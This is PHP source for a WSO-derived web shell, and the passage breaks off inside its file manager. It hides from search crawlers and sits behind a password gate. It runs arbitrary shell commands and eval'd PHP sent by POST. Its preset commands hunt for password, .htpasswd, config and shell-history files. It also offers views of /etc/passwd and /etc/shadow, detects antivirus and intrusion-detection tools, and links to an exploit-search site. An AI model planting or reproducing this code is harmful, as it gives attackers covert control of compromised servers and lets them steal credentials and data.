##############################
###[ SHELL BASED FROM WSO ]###
##############################

$auth_password  = "db2180efe775b8addaf943c104da3df3";
$default_color  = "#f2f4af";
$default_action = 'FilesMan';
$default_ajax   = true;
$page_charset   = 'Windows-1251';

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('MOC_VERSION', '2.0');

if(!empty($_SERVER['HTTP_USER_AGENT'])){
  $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Spider");
  if(preg_match('/'.implode('|', $userAgents).'/i', $_SERVER['HTTP_USER_AGENT'])){
    header('HTTP/1.0 404 Not Found');
    exit;
  }
}
if(get_magic_quotes_gpc()){
  function mocStripSlashes($array){
    return is_array($array) ? array_map('mocStripSlashes', $array) : stripslashes($array);
  }
  $_POST   = mocStripSlashes($_POST);
  $_COOKIE = mocStripSlashes($_COOKIE);
}
function mocLogin(){
  die("<pre align=center><form method=post><input type=password name=pass><input type=submit value='&#8499;'></form></pre>");
}
function mocSetCookie($k, $v){
  $_COOKIE[$k] = $v;
  setcookie($k, $v);
}
if(!empty($auth_password)){
  if(isset($_POST['pass']) && (md5($_POST['pass'])==$auth_password))
  mocSetCookie(md5($_SERVER['HTTP_HOST']), $auth_password);
  if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_password))
  mocLogin();
}
if(strtolower(substr(PHP_OS, 0, 3))=="win") $os = 'win';
else $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd          = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os=='win'){
  $home_cwd = str_replace("\\", "/", $home_cwd);
  $cwd      = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd) - 1] != '/')
$cwd .= '/';
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']))
$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = (bool)$default_ajax;
if($os=='win')
$aliases = array(
  "List Directory"                  => "dir",
  "Find index.php in current dir"   => "dir /s /w /b index.php",
  "Find *config*.php in current dir"=> "dir /s /w /b *config*.php",
  "Show active connections"         => "netstat -an",
  "Show running services"           => "net start",
  "User accounts"                   => "net user",
  "Show computers"                  => "net view",
  "ARP Table"                       => "arp -a",
  "IP Configuration"                => "ipconfig /all"
);
else
$aliases = array(
  "List dir"                                                   => "ls -lha",
  "list file attributes on a Linux second extended file system"=> "lsattr -va",
  "show opened ports"                                          => "netstat -an | grep -i listen",
  "process status"                                             => "ps aux",
  "Find"                                                       => "",
  "find all suid files"                                        => "find / -type f -perm -04000 -ls",
  "find suid files in current dir"                             => "find . -type f -perm -04000 -ls",
  "find all sgid files"                                        => "find / -type f -perm -02000 -ls",
  "find sgid files in current dir"                             => "find . -type f -perm -02000 -ls",
  "find config.inc.php files"                                  => "find / -type f -name config.inc.php",
  "find config* files"                                         => "find / -type f -name \"config*\"",
  "find config* files in current dir"                          => "find . -type f -name \"config*\"",
  "find all writable folders and files"                        => "find / -perm -2 -ls",
  "find all writable folders and files in current dir"         => "find . -perm -2 -ls",
  "find all service.pwd files"                                 => "find / -type f -name service.pwd",
  "find service.pwd files in current dir"                      => "find . -type f -name service.pwd",
  "find all .htpasswd files"                                   => "find / -type f -name .htpasswd",
  "find .htpasswd files in current dir"                        => "find . -type f -name .htpasswd",
  "find all .bash_history files"                               => "find / -type f -name .bash_history",
  "find .bash_history files in current dir"                    => "find . -type f -name .bash_history",
  "find all .fetchmailrc files"                                => "find / -type f -name .fetchmailrc",
  "find .fetchmailrc files in current dir"                     => "find . -type f -name .fetchmailrc",
  "Locate"                                                     => "",
  "locate httpd.conf files"                                    => "locate httpd.conf",
  "locate vhosts.conf files"                                   => "locate vhosts.conf",
  "locate proftpd.conf files"                                  => "locate proftpd.conf",
  "locate psybnc.conf files"                                   => "locate psybnc.conf",
  "locate my.conf files"                                       => "locate my.conf",
  "locate admin.php files"                                     => "locate admin.php",
  "locate cfg.php files"                                       => "locate cfg.php",
  "locate conf.php files"                                      => "locate conf.php",
  "locate config.dat files"                                    => "locate config.dat",
  "locate config.php files"                                    => "locate config.php",
  "locate config.inc files"                                    => "locate config.inc",
  "locate config.inc.php"                                      => "locate config.inc.php",
  "locate config.default.php files"                            => "locate config.default.php",
  "locate config* files "                                      => "locate config",
  "locate .conf files"                                         => "locate '.conf'",
  "locate .pwd files"                                          => "locate '.pwd'",
  "locate .sql files"                                          => "locate '.sql'",
  "locate .htpasswd files"                                     => "locate '.htpasswd'",
  "locate .bash_history files"                                 => "locate '.bash_history'",
  "locate .mysql_history files"                                => "locate '.mysql_history'",
  "locate .fetchmailrc files"                                  => "locate '.fetchmailrc'",
  "locate backup files"                                        => "locate backup",
  "locate dump files"                                          => "locate dump",
  "locate priv files"                                          => "locate priv"
);
function mocHeader(){
  if(empty($_POST['charset']))
  $_POST['charset'] = $GLOBALS['page_charset'];
  global $default_color;
  echo "<html><head>
  <meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset']."'>
  <title>".$_SERVER['HTTP_HOST']." - MQ ".MOC_VERSION."</title>
  <style><!--
  body { background:url(\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAGCAYAAADgzO9IAAAACXBIWXMAAC4jAAAuIwF4pT92AAAAT0lEQVR4nD2LwQrAMAhDU/BY3b3s/79s9D7t3c2OLCDqSyIA8h1o72itwVTrhRAeZrjm3LBMIaQ8Apn5NZg8x9j7docwHWv9sO7doElYegDR9h8b/Ku5pwAAAABJRU5ErkJggg==\") center; background-attachment: fixed; overflow-x: hidden; font: normal normal 9pt Lucida, Verdana; color: #ddd; margin: auto; }
  #content { background: #232323; border: 1px solid #000; margin: 2px; padding: 2px; }
  #error { background: #9f2d2d; text-align: center; color: #ddd; border: 1px solid #b24040; margin: 2px; padding: 2px; font-weight: bold; }
  #success { background: #087f08; text-align: center; color: #ddd; border: 1px solid #0d900d; margin: 2px; padding: 2px; font-weight: bold; }
  #none { background: none; border: none; }
  #border { background: none; border-left: 2px solid #444; border-top: none; border-right: none; border-bottom: none; padding: 0px 5px; }
  #title { background: #eee; color: #232323; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; -khtml-border-radius: 3px; border: 1px solid #fff; margin: 2px; padding: 3px; }
  #return a, #return a:hover { text-decoration:none; }
  #return { background:#807A00; border:1px solid #989100; font-weight: bold; }
  #return:hover { background:#726C00; border:1px solid #989100; font-weight: bold; }
  #code { background: #eee; color: #232323; border: 1px solid #fff; font: normal normal 10pt Courier, Monospace; padding: 0px; max-width: 99.7%; overflow: auto; }
  .main td, .main th { background: transparent; }
  .code { overflow: auto; }
  .input { width: 300px }
  .h_a { background: #303030 }
  .h_b { background: #282828 }
  .h_c { background: #eee; width: 100%; border: none; padding-left: 5px; padding-right: 5px; color: #007700; font: normal normal 10pt Courier, Monospace; }
  .h_d { background: #e5e5e5; width: 100%; border: none; padding-left: 5px; padding-right: 5px; color: #007700; font: normal normal 10pt Courier, Monospace; }
  .h_h { background: #343434; color: #ddd; border: 1px solid #232323; font: normal normal 10pt Courier, Monospace; text-align: center; }
  .hasil { background: #eee; color: #232323; border: 1px solid #fff; margin: 2px; padding: 5px; }
  .main a { font-weight: normal; }
  .main th{ text-align: left; background: #454545; }
  .main tr:hover { background: #373737 }
  .option { padding: 3px; margin: 2px; }
  pre { font: normal normal 10pt Courier, Monospace; padding: 3px; max-width: 99.7%; overflow: auto; }
  td, th, .option { background: #343434; color: #ddd; font: normal normal 9pt Lucida, Verdana; vertical-align: middle; border:1px solid #444; margin: 2px; }
  input[type=\"submit\"], input[type=\"button\"] { font: normal normal 9pt Lucida, Verdana; color: $default_color; width: 60px; font-weight: bold; }
  input, select, option { background:#232323; color: #ddd; font: normal normal 9pt Helvetica, Arial, sans-serif; border: 1px solid #444; padding: 3px; margin: 2px; }
  input[type=\"text\"], input[type=\"file\"], select, option {}
  h1 { border-left: 10px solid #343434; font: 11pt Verdana; color: #343434; padding-left: 10px; font-weight: bold; margin: 0px; !important; }
  textarea { background: #232323; color: #ddd; font: normal normal 10pt Monospace,'Courier New'; border: 1px solid #444; margin: 2px; auto; width: 99.7%; height: 300px; padding: 5px; }
  form { margin: 0px; }
  span, a { color: ".$default_color." !important; font-weight: bold; }
  a { text-decoration: none; }
  a:hover { text-decoration: underline; }
  //-->
  </style>
  <script>
  var c_ = '".htmlspecialchars($GLOBALS['cwd'])."';
  var a_ = '".htmlspecialchars(@$_POST['a'])."'
  var charset_ = '".htmlspecialchars(@$_POST['charset'])."';
  var p1_ = '".((strpos(@$_POST['p1'], "\n") !== false)?'':htmlspecialchars($_POST['p1'], ENT_QUOTES))."';
  var p2_ = '".((strpos(@$_POST['p2'], "\n") !== false)?'':htmlspecialchars($_POST['p2'], ENT_QUOTES))."';
  var p3_ = '".((strpos(@$_POST['p3'], "\n") !== false)?'':htmlspecialchars($_POST['p3'], ENT_QUOTES))."';
  var d = document;
  function set(a,c,p1,p2,p3,charset) {
  if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  }
  function g(a,c,p1,p2,p3,charset) {
  set(a,c,p1,p2,p3,charset);
  d.mf.submit();
  }
  function a(a,c,p1,p2,p3,charset) {
  set(a,c,p1,p2,p3,charset);
  var params = 'ajax=true';
  for(i=0;i<d.mf.elements.length;i++)
  params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  sr('".addslashes($_SERVER['REQUEST_URI'])."', params);
  }
  function sr(url, params) {
  if (window.XMLHttpRequest)
  req = new XMLHttpRequest();
  else if (window.ActiveXObject)
  req = new ActiveXObject('Microsoft.XMLHTTP');
  if (req) {
  req.onreadystatechange = processReqChange;
  req.open('POST', url, true);
  req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  req.send(params);
  }
  }
  function processReqChange() {
  if((req.readyState == 4))
  if(req.status == 200) {
  var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  var arr=reg.exec(req.responseText);
  eval(arr[2].substr(0, arr[1]));
  } else alert('Request error!');
  }
  </script>
  <head><body>
  <div style='width: 80%; top: 0; left: 0; margin: 5px auto;'>
  <form method=post name=mf style='display:none;'>
  <input type=hidden name=a><input type=hidden name=c>
  <input type=hidden name=p1><input type=hidden name=p2>
  <input type=hidden name=p3><input type=hidden name=charset>
  </form>";
  $freeSpace = @diskfreespace($GLOBALS['cwd']);
  $totalSpace= @disk_total_space($GLOBALS['cwd']);
  $totalSpace= $totalSpace?$totalSpace:1;
  $release   = @php_uname('r');
  $kernel    = @php_uname('s');
  $explink   = 'http://0day.today/search?search_request=';
  if(strpos('Linux', $kernel) !== false)
  $explink .= urlencode('Linux Kernel '.substr($release, 0, 6));
  else
  $explink .= urlencode($kernel.' '.substr($release, 0, 3));
  if(!function_exists('posix_getegid')){
    $user = @get_current_user();
    $uid  = @getmyuid();
    $gid  = @getmygid();
    $group= "?";
  }
  else{
    $uid   = @posix_getpwuid(posix_geteuid());
    $gid   = @posix_getgrgid(posix_getegid());
    $user  = $uid['name'];
    $uid   = $uid['uid'];
    $group = $gid['name'];
    $gid   = $gid['gid'];
  }
  $cwd_links = '';
  $path      = explode("/", $GLOBALS['cwd']);
  $n         = count($path);
  for($i = 0; $i < $n - 1; $i++){
    $cwd_links .= "<a href='#' style='font-weight: normal' onclick='g(\"FilesMan\",\"";
    for($j = 0; $j <= $i; $j++)
    $cwd_links .= $path[$j].'/';
    $cwd_links .= "\")'>".$path[$i]."/</a>";
  }
  $charsets = array('UTF-8','Windows-1251','KOI8-R','KOI8-U','CP866');
  $opt_charsets = '';
  foreach($charsets as $item)
  $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  $m = array('Files'=>'FilesMan', 'Sec. Info'=>'SecInfo', 'Console'=>'Console', 'Sql'=>'Sql', 'Php'=>'Php', 'Tools'=>'StringTools', 'Bruteforce'=>'Bruteforce', 'Network'=>'Network');
  if(!empty($GLOBALS['auth_password']))
  $m['Logout'] = 'Logout';
  $m['Suicide'] = 'SelfRemove';
  $menu = '';
  foreach($m as $k => $v)
  $menu .= '<th id=return width="'.(int)(100 / count($m)).'%"><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.strtoupper($k).'</a></th>';
  $drives = "";
  if($GLOBALS['os']=='win'){
    foreach(range('c','z') as $drive)
    if(is_dir($drive.':\\'))
    $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  }
  echo '<div id=content><div class=option>
  <table cellpadding=3 cellspacing=2>
  <tr>
  <td id=none><span>Uname</span></td>
  <td id=border width=100%>'.substr(@php_uname(), 0, 120).' <a href="'.$explink.'" target=_blank>[ exploit ]</a></td>
  <td id=border ><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page Charset">'.$opt_charsets.'</optgroup></select></td>
  </tr>
  <tr>
  <td id=none><span>User</span></td>
  <td id=border width=100%>'.$uid.' ('.$user.') <span>Group:</span> '.$gid.' ('.$group.')</td>
  <td id=border><span>Your Address</span></td>
  </tr>
  <tr>
  <td id=none><span>PHP</span></td>
  <td id=border width=100%><b>SAFE MODE:</b> '.($GLOBALS['safe_mode']?'<font color=#db5b5b><b>ON</b></font>':'<font color=#3da92f><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <b>Version:</b> '.@phpversion().' <b>Datetime:</b> '.date('Y-m-d H:i:s').'</td>
  <td id=border>'.@$_SERVER['REMOTE_ADDR'].'</td>
  </tr>
  <tr>
  <td id=none><span>Harddisk</span></td>
  <td id=border width=100%><b>Total:</b> '.mocViewSize($totalSpace).' <b>Free:</b> '.mocViewSize($freeSpace).' ('.(int)($freeSpace / $totalSpace * 100).'%)</td>
  <td id=border><span>Server Address</span></td>
  </tr>
  <tr>
  <td id=none><span>CWD '.($GLOBALS['os']=='win'?'<br>Drives:':'').'</span></td>
  <td id=border width=100%> '.$cwd_links.' '.mocPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a>'.$drives.'</td>
  <td id=border>'.@$_SERVER["SERVER_ADDR"].'</td>
  </tr></table></div>';
  echo '<table cellpadding=3 cellspacing=2 width=100%><tr>'.$menu.'</tr></table></div><div id=content>';
}
function mocFooter(){
  $is_writable = is_writable($GLOBALS['cwd'])?" <font color=#3da92f><b>&#10004;</b></font>":" <font color=#DB5B5B><b>&#10006;</b></font>";
  echo "</div>
  <div id=content><div id=title><h1>Shell Executions</h1></div>
  <table class=table cellpadding=3 cellspacing=2 width=100%'>
  <tr>
  <th><span>Command</span></th>
  <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><input class='input' type=text name=c value=''><input id=return type=submit value='Execute'></form></td>
  <th><span>Upload</span></th>
  <td><form method='post' ENCTYPE='multipart/form-data'>
  <input type=hidden name=a value='FilesMan'>
  <input type=hidden name=c value='".$GLOBALS['cwd']."'>
  <input type=hidden name=p1 value='uploadFile'>
  <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
  <input class='input' type=file name=f><input id=return type=submit value='Submit'>$is_writable</form></td>
  </tr>
  <tr>
  <th><span>New Dir</span></th>
  <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><input class='input' type=text name=d><input id=return type=submit value='Create'>$is_writable</form></td>
  <th><span>New File</span></th>
  <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><input class='input' type=text name=f><input id=return type=submit value='Create'>$is_writable</form></td>
  </tr>
  <tr>
  <th><span>Directory</span></th>
  <td><form onsubmit='g(null,this.c.value,\"\");return false;'><input class='input' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input id=return type=submit value='Change'></form></td>
  <th><span>Read File</span></th>
  <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><input class='input' type=text name=f><input id=return type=submit value='Read'></form></td>
  </tr>
  </table></div></body></html>";
}
if(!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)){
  function posix_getpwuid($p){
    return false;
  }
}
if(!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)){
  function posix_getgrgid($p){
    return false;
  }
}
function mocCommand($in){
  $out = '';
  if(function_exists('exec')){
    @exec($in, $out);
    $out = @join("\n", $out);
  }
  elseif(function_exists('passthru')){
    ob_start();
    @passthru($in);
    $out = ob_get_clean();
  }
  elseif(function_exists('system')){
    ob_start();
    @system($in);
    $out = ob_get_clean();
  }
  elseif(function_exists('shell_exec')){
    $out = shell_exec($in);
  }
  elseif(is_resource($f = @popen($in, "r"))){
    $out = "";
    while(!@feof($f))
    $out .= fread($f, 1024);
    pclose($f);
  }
  return $out;
}
function mocViewSize($s){
  if($s >= 1073741824)
  return sprintf('%1.2f', $s / 1073741824).' GB';
  elseif($s >= 1048576)
  return sprintf('%1.2f', $s / 1048576).' MB';
  elseif($s >= 1024)
  return sprintf('%1.2f', $s / 1024).' KB';
  else
  return $s.' B';
}
function mocPerms($p){
  if(($p & 0xC000)==0xC000)$i = 's';
  elseif(($p & 0xA000)==0xA000)$i = 'l';
  elseif(($p & 0x8000)==0x8000)$i = '-';
  elseif(($p & 0x6000)==0x6000)$i = 'b';
  elseif(($p & 0x4000)==0x4000)$i = 'd';
  elseif(($p & 0x2000)==0x2000)$i = 'c';
  elseif(($p & 0x1000)==0x1000)$i = 'p';
  else $i = 'u';
  $i .= (($p & 0x0100) ? 'r' : '-');
  $i .= (($p & 0x0080) ? 'w' : '-');
  $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
  $i .= (($p & 0x0020) ? 'r' : '-');
  $i .= (($p & 0x0010) ? 'w' : '-');
  $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
  $i .= (($p & 0x0004) ? 'r' : '-');
  $i .= (($p & 0x0002) ? 'w' : '-');
  $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
  return $i;
}
function mocPermsColor($f){
  if(!@is_readable($f))
  return '<font color=#db5b5b>'.mocPerms(@fileperms($f)).'</font>';
  elseif(!@is_writable($f))
  return '<font color=#ddd>'.mocPerms(@fileperms($f)).'</font>';
  else
  return '<font color=#3da92f>'.mocPerms(@fileperms($f)).'</font>';
}
function mocScanDir($dir){
  if(function_exists("scandir")){
    return scandir($dir);
  }
  else{
    $dh = opendir($dir);
    while(false !== ($filename = readdir($dh)))
    $files[] = $filename;
    return $files;
  }
}
function mocWhich($p){
  $path = mocCommand('which '.$p);
  if(!empty($path))
  return $path;
  return false;
}
function ActionSecInfo(){
  mocHeader();
  echo '<div id=title><h1>Security Informations</h1></div><table cellpadding=3 cellspacing=2 width=100%>';
  function mocSecParam($n, $v){
    $v = trim($v);
    if($v){
      echo '<tr><th><span>'.$n.' </span></th><td>';
      if(strpos($v, "\n") === false)
      echo $v.'<br>';
      else
      echo '<pre class=code>'.$v.'</pre>';
      echo '</td></tr>';
    }
  }
  mocSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  if(function_exists('apache_get_modules'))
  mocSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  mocSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
  mocSecParam('Open base dir', @ini_get('open_basedir'));
  mocSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  mocSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  mocSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  $temp = array();
  if(function_exists('mysql_get_client_info'))
  $temp[] = "MySql (".mysql_get_client_info().")";
  if(function_exists('mssql_connect'))
  $temp[] = "MSSQL";
  if(function_exists('pg_connect'))
  $temp[] = "PostgreSQL";
  if(function_exists('oci_connect'))
  $temp[] = "Oracle";
  mocSecParam('Supported databases', implode(', ', $temp));
  if($GLOBALS['os']=='nix'){
    mocSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[ view ]</a>":'no');
    mocSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[ view ]</a>":'no');
    mocSecParam('OS version', @file_get_contents('/proc/version'));
    mocSecParam('Distr name', @file_get_contents('/etc/issue.net'));
    if(!$GLOBALS['safe_mode']){
      $userful = array('gcc','lcc','cc','ld','make','gmake','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
      $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
      $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror','lwp-download');
      $temp = array();
      foreach($userful as $item)
      if(mocWhich($item))
      $temp[] = $item;
      mocSecParam('Userful', implode(', ', $temp));
      $temp = array();
      foreach($danger as $item)
      if(mocWhich($item))
      $temp[] = $item;
      mocSecParam('Danger', implode(', ', $temp));
      $temp = array();
      foreach($downloaders as $item)
      if(mocWhich($item))
      $temp[] = $item;
      mocSecParam('Downloaders', implode(', ', $temp));
      mocSecParam('Harddisk space', mocCommand('df -h'));
      mocSecParam('Hosts', @file_get_contents('/etc/hosts'));
      echo '</tr><tr><th><span>posix_getpwuid<br>"read" /etc/passwd</span></th><td><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><span>From:</span> <input type=text name=param1 value=0> <span>To:</span><input type=text name=param2 value=1000> <input id=return type=submit value="Read"></form>';
      if(isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])){
        $temp = "";
        for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++){
          $uid = @posix_getpwuid($_POST['p2']);
          if($uid)
          $temp .= join(':', $uid)."\n";
        }
        echo '';
        mocSecParam('Users', $temp);
      }
    }
  }
  else{
    mocSecParam('OS Version', mocCommand('ver'));
    mocSecParam('Account Settings', mocCommand('net accounts'));
    mocSecParam('User Accounts', mocCommand('net user'));
  }
  echo '</table>';
  mocFooter();
}
function ActionPhp(){
  if(isset($_POST['ajax'])){
    mocSetCookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
    ob_start();
    eval($_POST['p1']);
    $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0")."';\n";
    echo strlen($temp), "\n", $temp;
    exit;
  }
  if(empty($_POST['ajax']) && !empty($_POST['p1']))
  mocSetCookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  mocHeader();
  if(isset($_POST['p2']) && ($_POST['p2']=='info')){
    echo '<div id=title><h1>PHP Info</h1></div><div id=content><style>.p {color:#000;}</style>';
    ob_start();
    phpinfo();
    $tmp = ob_get_clean();
    $tmp = preg_replace(array(
        '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
        '!td, th {(.*)}!msiU',
        '!<img[^>]+>!msiU',
      ), array(
        '',
        '.e, .v, .h, .h th {$1}',
        ''
      ), $tmp);
    echo str_replace('<h1','<h2', $tmp).'</div><br>';
  }
  echo '<div id=title><h1>PHP Code Execution</h1></div>
  <form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;">
  <textarea name=code class=area id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea>
  <div class=option><input id=return type=submit value="Eval">';
  echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form></div>
  <pre class=hasil id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'">';
  if(!empty($_POST['p1'])){
    ob_start();
    eval($_POST['p1']);
    echo htmlspecialchars(ob_get_clean());
  }
  echo '</pre>';
  mocFooter();
}
function ActionFilesMan(){
  if(!empty($_COOKIE['f']))
  $_COOKIE['f'] = @unserialize($_COOKIE['f']);
  if(!empty($_POST['p1'])){
    switch($_POST['p1']){
      case 'uploadFile':
      if(empty($_FILES['f']['tmp_name'])) $comNew = '<div id=error>No file to upload.</div>';
      else {
        if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
        $comNew = '<div id=error>File [ '.$_FILES['f']['tmp_name'].' ] => [ '.$_FILES['f']['name'].' ] not uploaded.</div>';
        else $comNew = '<div id=success>File [ '.$_FILES['f']['name'].' ] was uploaded.</div>';
      }
      break;
      case 'mkdir':
      if(!@mkdir($_POST['p2']))
      $comNew = "<div id=error>Can not create new dir.</div>";
      else $comNew = '<div id=success>Directory [ '.$_POST['p2'].' ] created.</div>';
      break;
      case 'delete':
      function mocDeleteDir($path){
        $path = (substr($path, - 1)=='/') ? $path:$path.'/';
        $dh   = opendir($path);
        while(($item = readdir($dh)) !== false){
          $item = $path.$item;
          if((basename($item)=="..") || (basename($item)=="."))
          continue;
          $type = filetype($item);
          if($type=="dir")
          mocDeleteDir($item);
          else
          @unlink($item);
        }
        closedir($dh);
        @rmdir($path);
      }
      if(is_array(@$_POST['f']))
      foreach($_POST['f'] as $f){
        if($f=='..')
        continue;
        $f = urldecode($f);
        if(is_dir($f))
        mocDeleteDir($f);
        else
        @unlink($f);
      }
      break;
      case 'paste':
      if($_COOKIE['act']=='copy'){
        function mocCopas($c, $s, $d){
          if(is_dir($c.$s)){
            mkdir($d.$s);
            $h = @opendir($c.$s);
            while(($f = @readdir($h)) !== false)
            if(($f != ".") and ($f != ".."))
            mocCopas($c.$s.'/', $f, $d.$s.'/');
          }
          elseif(is_file($c.$s))
          @copy($c.$s, $d.$s);
        }
        foreach($_COOKIE['f'] as $f)
        mocCopas($_COOKIE['c'], $f, $GLOBALS['cwd']);
      }
      elseif($_COOKIE['act']=='move'){
        function mocMovePas($c, $s, $d){
          if(is_dir($c.$s)){
            mkdir($d.$s);
            $h = @opendir($c.$s);
            while(($f = @readdir($h)) !== false)
            if(($f != ".") and ($f != ".."))
            mocCopas($c.$s.'/', $f, $d.$s.'/');
          }
          elseif(@is_file($c.$s))
          @copy($c.$s, $d.$s);
        }
        foreach($_COOKIE['f'] as $f)
        @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
      }
      elseif($_COOKIE['act']=='zip'){
        if(class_exists('ZipArchive')){
          $zip = new ZipArchive();
          if($zip->open($_POST['p2'], 1)){
            chdir($_COOKIE['c']);
            foreach($_COOKIE['f'] as $f){
              if($f=='..')
              continue;
              if(@is_file($_COOKIE['c'].$f))
              $zip->addFile($_COOKIE['c'].$f, $f);
              elseif(@is_dir($_COOKIE['c'].$f)){
                $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
                foreach($iterator as $key=>$value){
                  $zip->addFile(realpath($key), $key);
                }
              }
            }
            chdir($GLOBALS['cwd']);
            $zip->close();
          }
        }
      }
      elseif($_COOKIE['act']=='unzip'){
        if(class_exists('ZipArchive')){
          $zip = new ZipArchive();
          foreach($_COOKIE['f'] as $f){
            if($zip->open($_COOKIE['c'].$f)){
              $zip->extractTo($GLOBALS['cwd']);
              $zip->close();
            }
          }
        }
      }
      elseif($_COOKIE['act']=='tar'){
        chdir($_COOKIE['c']);
        $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
        mocCommand('tar cfzv '.escapeshellarg($_POST['p2']).' '.implode(' ', $_COOKIE['f']));
        chdir($GLOBALS['cwd']);
      }
      unset($_COOKIE['f']);
      setcookie('f', '', time() - 3600);
      break;
      default:
      if(!empty($_POST['p1'])){
        mocSetCookie('act', $_POST['p1']);
        mocSetCookie('f', serialize(@$_POST['f']));
        mocSetCookie('c', @$_POST['c']);
      }
      break;
    }
  }
  mocHeader();
  echo '<div id=title><h1>File Manager</h1></div><script>p1_=p2_=p3_="";</script>';
  $dirContent = mocScanDir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
  if($comNew) echo $comNew;
  if($dirContent==false){
    echo '<div id=error>Can not open this folder.</div>'; mocFooter(); return;
  }
  global $sort;
  $sort = array('name', 1);
  if(!empty($_POST['p1'])){
    if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
    $sort = array($match[1],(int)$match[2]);
  }
  echo "<script>
  function sa() {
  for(i=0;i<d.files.elements.length;i++)
  if(d.files.elements[i].type == 'checkbox')
  d.files.elements[i].checked = d.files.elements[0].checked;
  }
  </script>
  <table width=100% class=main cellspacing=2 cellpadding=2>
